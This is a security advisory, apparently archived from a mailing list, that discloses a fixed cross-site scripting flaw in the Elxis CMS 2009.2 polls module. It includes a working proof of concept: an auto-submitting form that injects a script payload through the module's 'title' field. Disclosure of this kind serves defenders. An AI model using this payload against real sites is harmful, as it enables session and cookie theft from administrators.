[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XSS vulnerability in Elxis CMS polls module



Vulnerability ID: HTB22616
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_elxis_cms_polls_module.html
Product: Elxis CMS
Vendor: Elxis Team ( http://www.elxis.org/ ) 
Vulnerable Version: 2009.2 electra rev2631 and probably prior versions
Vendor Notification: 20 September 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "administrator/components/com_modules/admin.modules.php" script to properly sanitize user-supplied input in "title" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/administrator/index2.php"; method="post" name="main" >
<input type="hidden" name="title" value='Polls"><script>alert(document.cookie)</script>' />
<input type="hidden" name="showtitle" value="1" />
<input type="hidden" name="position" value="right" />
<input type="hidden" name="languages[]" value="" />
<input type="hidden" name="access" value="29" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="params[cache]" value="0" />
<input type="hidden" name="params[moduleclass_sfx]" value="" />
<input type="hidden" name="selections[]" value="0" />
<input type="hidden" name="option" value="com_modules" />
<input type="hidden" name="id" value="1" />
<input type="hidden" name="original" value="1" />
<input type="hidden" name="module" value="mod_poll" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="client_id" value="0" />
</form>
<script>
document.main.submit();
</script>

Solution: Upgrade to the most recent version